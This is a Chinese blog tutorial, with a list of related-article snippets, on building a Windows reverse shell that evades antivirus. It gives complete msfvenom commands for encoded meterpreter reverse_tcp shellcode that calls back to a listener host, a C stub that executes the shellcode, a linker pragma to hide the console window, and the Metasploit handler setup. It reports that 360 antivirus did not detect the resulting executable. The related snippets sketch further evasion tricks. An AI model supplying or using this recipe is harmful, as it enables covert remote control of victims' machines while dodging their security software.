MSF 生成静态免杀shell(win)

最新推荐文章于 2025-03-09 16:17:48 发布
最新推荐文章于 2025-03-09 16:17:48 发布
阅读量2.7k 收藏 14
点赞数 2
分类专栏: 笔记整理 文章标签: 静态免杀 msf Python exp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xg_ren/article/details/79172761
版权
本文介绍了如何使用Metasploit Framework(MSF)和C编译器或者Python来生成静态免杀的Windows shellcode。通过msfvenom生成shellcode,然后在C程序中加入入口函数并编译成可执行文件。在360杀毒软件下测试,成功实现了免杀效果,但执行特定恶意命令时仍会被360检测到。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

NO.1

利用工具

  1. msf

    msf全称 MetasploitFramework,是一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台,它集成了各种平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变的方便和简单。

  2. vc++

    c编译器

实现过程

1.使用msfvenom生成shellcode

msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b\x00’ lhost=192.168.68.129 lport=3333   -f c -o /root/Desktop/shell/shell.c
  -p : 指定payload; -e :指定编码方式; -i :编译次数; -b :去除指定代码,一般是空代码或者错误代码; lhost :指定本机IP; -lport :指定本机监听端口; -f :指定生成格式; -o指定生成输出后存储文件的位置

上图
这里写图片描述
这里写图片描述
2. 加入入口函数,开始编译

main()
{
((void(*)(void))&buf)();
}

上图
这里写图片描述
执行后会在下方有显示,不成功会报错,成功会提示error为0(3是开始执行,这里我没点,我待会手动运行)
这里写图片描述
最后会在你原文件存在的目录生成exe可执行文件
这里写图片描述
编译ok
3. 开始监听

msfconsole   //运行msf
use exploit/multi/handler   //使用handler模块
set lhost 192.168.68.129   //这里的IP需要和exp中IP一致
set lport 3333            //端口与IP一样要和上面的端口一致
set payload windows/meterpreter/reverse_tcp  //指定payload
exploit                   //开始监听

上图
这里写图片描述
4. 运行exe,看是否免杀
这里写图片描述
可以看到监听到IP
这里写图片描述
查看返回的session
这里写图片描述
运行成功,360没有报毒
但是有没有发现运行exe文件会弹出一个命令框,这样很容易就被发现了,所以需要对这个exp进行完善,所以请看number tow

NO.2

前面的步骤都一样,在编译时多添几行代码

#include<stdio.h>
#include<windows.h>
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")    //禁止弹窗

上图
这里写图片描述
运行监听
这里写图片描述
360没报毒
这里写图片描述
OK;
以上呢都是c编译的,还有一种方法,可以使用Python编译生成exp,详细见number three

NO.3

利用工具
  1. msf
  2. Python2
实现过程

1.生成.py的shellcode

msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b\x00’ lhost=192.168.68.129 lport=3333   -f py -o /home/shell/test001.py

上图

最低0.47元/天 解锁文章
对抗-MSF\CS-shellcode进行base64编码,python调用执行
m0_62172162的博客
04-25 718
对抗-MSF\CS-shellcode进行base64编码,python调用执行
实战shell&C2远控&工具魔改(日记 - 上篇)
guanjian_ci的博客
06-05 6376
1、上面实验内容并不多,但是工具的使用、环境的安装、代码的排错够新手玩上几天了。2、绕过毒软件的本质就是防止被毒库匹配,代码、工具指纹等等!3、一个好的,一定具备了多方面的性能:防软、绕过流量平台、防沙箱、防逆向调试后依然能够正常运行上线!4、此文章分上 、 中 、下,未完待续... ...
Shellcode对抗(C/C++)
热门推荐
qq_74806534的博客
02-17 2万+
这里便是毒软件毒的原理,这就是特征,我们只需要将木马程序进行简单的分析,就能得到shell回连的IP地址和端口,如果毒软件发现我们的可执行文件是一个木马程序。加载器的作用:由于shellcode是一段可以执行的二进制代码,因此需要开辟出一段可以读写可操作的地址来运行shellcode,而这就是加载器的作用。之后打开.c文件是一个未编译代码,放到上文的编译代码中,注意这里是x64编译,用的方式三,使用.c文件。因为我们的加载器的特征,各平台毒软件都有了已经,所有我们就要用新的,特征没有被锁定。
木马之利用shellcode生成木马
最新发布
没有网络安全就没有国家安全
03-09 1020
木马之利用shellcode生成木马
WEB渗透篇-MSF+shellcode
qq_59468567的博客
08-16 583
目前过火绒,不过360,可组合一下 Vs新建c++控制台程序 右键属性-》将MFC的使用选为在静态库中使用MFC 生成c格式shellcode粘贴进remote inject.cpp。生成的py文件使用py2exe编译执行 生成的cs文件使用csc.exe编译执行 生成的cpp文件使用vc6.0编译,去掉预编译头编译执行。正常执行结束进程msbuild会失去会话,以下保存bat执行 获得session后立刻迁移进程。生成项目 能成功上线,并开启calc进程。当前过不了火绒,360动态静态可过。
MSF编码器结合shellcode加载器实现
2401_83237906的博客
11-24 454
所用环境:技术简介: 技术全称为反毒技术, Anti-Virus 简称“”,指是一种能使病毒木马于被毒软件查的技术。技术的涉猎面广泛,其中包含反汇编、逆向工程、系统漏洞等技术,内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了毒软件的查。这里介绍一个网站,这是一个费的在线服务,它允许用户上传文件或提交网址,以检查它们是否包含恶意软件或其他潜在的安全威胁。VirusTotal 通过使用多种不同的病毒扫描引擎和安全工具来分析提交的文件或链接,从而提供更全面的检测结果。
入门---shellcode
LvHLong的博客
05-03 5824
前言 本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。 基础概念 技术全称为反毒技术Anti Anti- Virus简称“”,它指的是一种能使病毒木马于被毒软件查的技术。 毒软件工作原理 市面上的毒软件基本由扫描器、病毒特征库和虚拟机组成,它会把文件放在虚拟机内运行,扫描该文件的特征,包括静态特征、内存特征、行为特征等,通过和病毒特征库对比来判断一个文件是否为恶意文件。安全厂商一直在收集市面上出现的...
小七专用webshell
04-25
小七专用webshell,性能好。稳定性强
基本知识,shellcode混淆
2401_84466223的博客
06-04 913
根据源代码我们看到在执行完call ebp以后,就执行了设置地址的操作,也就是说在shellcode中存在了反弹连接的ip地址,这里我们将生成的exe程序放到debug程序中,根据c的源代码,我们的shellcode是在call eax中,所以首先要搜索call eax步入进去以后就进入到shellcde中的代码,在shellcode中找到call ebp。最常见的就是360,刚刚上传的木马没有报毒,但是几分钟之内就会被检测为病毒程序,就是因为360会使用云查技术,这也是360查能力强的原因。
毒与技术详解---白嫖党福音
weixin_46737755的博客
01-15 1788
简介 不管是社工钓鱼,还是一句话木马getshell,远控,亦或者是反弹shell,都会遇到软waf这些大敌,当然主要还是软,因此我们不得不考虑进而实现我们渗透测试目的。 概念 1.1 类别 简单总结下我知道的类别: 一句话木马绕狗(我觉得他不应该出现在这里,但为了致敬我学习的第一个,把他放了出来) 文件不落地 shellcode加密 修改源码增加花指令 DLL加载 自定义加载器 指定特定的运行方式 加壳 当然还可以按照大的类别划分 静态扫描 内存扫描 流量分析 行为分
msf生成win木马
weixin_40709439的博客
01-24 7225
参考一大佬的 在linux下生成一个反弹的msfpython脚本,命令如下: msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.1681.102 -e x86/shikata_ga_nai -i 11 -f py -o /mo.py 查看下py的内容 将buf值全部替换成mo.py的,其他不用修改 from c...
shellcode思路
u013367305的博客
05-04 1616
shellcode思路 使用msfconsole生产的shellcode之后正常写入到程序的内存里面的话会直接被毒软件静态就能掉。 如果我们直接把shellcode贴入到自己程序中的话,编译出来的exe文件就会带上这段byte,而毒软件对此非常敏感所以会直接被掉。 // An highlighted block unsigned char sendBuf[355] = "\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x5
msf基操shell(转)
qq_45290991的博客
07-16 877
实验准备: 攻击(攻击者)主机:          kali 2020.2  虚拟机        nat              ...
工具】Windows通用shellcode加载器
Fly_鹏程万里
06-11 1430
本工具由ShellQMaker.exe和加载模板文件(loading.exe)组成。ShellQMaker.exe将不同的shellcode写入加载的模板文件(loading.exe)中,生成不同的可执行文件。运行环境:加载器模板通过QT实现使用C++开发,并由VS2022静态编译,目前只有一种加载模式,其他加载模式正在开发中。使用方法:使用vs2022打开项目解决方案(.sln),然后进行编译即可,当然你也可以从。ShellQMaker (你的shellcode) (生成的可执行文件)
远控专题7 ---shellter
qq_41683305的博客
03-11 926
0x01 能力一览表 几点说明: 1、上表中标识 √ 说明相应毒软件未检测出病毒,也就是代表了Bypass。 2、为了更好的对比效果,大部分测试payload均使用msfwindows/meterperter/reverse_tcp模块生成。 3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒毒情况指的是静态+动态查。360毒版本5.0.0.8160(201...
不可不学!一些webshell的技巧
Appleteachers的博客
05-07 964
一些webshell的技巧 0x00:前言 由于软的规则在不断更新 所以很多之前的过软方法基本上都不行了 而且随着php7逐渐扩张 assert马也将被淘汰 所以本文将提出几种思路 效果很好 而且不会被软的正则和沙盒规则约束。 0x01:自定义加密Bypass 部分软会直接将一些编码函数如Base64、编码后的关键字或组合函数加入了规则 比如某dir+ 比如这个 都能被检测出是shell 所以为了防止这种的规则 自定义加密显然是最优解 自定义加密可选性多了 只要能把加密后的字符还原回去就行
使用MSF生成shellcode
weixin_34092455的博客
04-02 1115
使用MSF生成shellcode payload和shellcode的区别 Payload是是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码。因为Payload是包含在ShellCode中的,ShellCode是真正的被输入到存在漏洞的程序中的,并且ShellCode负责把程序的流程最终转移到你的Payload代码中。所以对于一个漏洞来说,ShellCode就...
msf生成Linux反弹shell
02-23
### 使用 Metasploit Framework 生成 Linux 反弹 Shell Payload 为了生成适用于 Linux 系统的反弹 shell payload,可以利用 Metasploit 中提供的 `msfvenom` 工具来创建所需的恶意负载。以下是具体方法: #### ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值